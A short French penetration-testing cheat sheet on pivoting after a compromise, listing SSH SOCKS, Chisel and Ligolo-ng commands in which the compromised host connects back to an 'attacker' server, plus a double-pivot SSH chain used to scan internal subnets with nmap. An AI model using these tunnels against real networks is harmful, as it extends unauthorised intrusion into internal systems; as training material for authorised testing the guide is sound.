Pivoting — Traverser les réseaux internes

Post-exploitation Tunneling

Qu'est-ce que le pivoting ?

En post-exploitation, une machine compromise sert souvent de "pivot" pour accéder à des réseaux internes normalement inaccessibles depuis Internet. Le pivot peut être SSH, Chisel, Ligolo, ou Metasploit.

Techniques de pivoting

# SSH Dynamic SOCKS5
ssh -D 1080 -N user@pivot
proxychains4 nmap -sT -Pn 10.10.10.0/24

# Chisel (tunnel HTTP)
# Serveur (attaquant) :
chisel server -p 8080 --reverse
# Client (pivot) :
chisel client attacker:8080 R:socks

# Ligolo-ng (plus rapide)
# Serveur :
ligolo-proxy -selfcert
# Agent (pivot) :
ligolo-agent -connect attacker:11601 -ignore-cert

Double pivot

# Atteindre un 3ème réseau via 2 machines
# Machine A -> Pivot B -> Pivot C -> Cible D

# Avec SSH
ssh -L 2222:PivotC:22 user@PivotB
ssh -p 2222 -D 1080 user@localhost
proxychains4 nmap target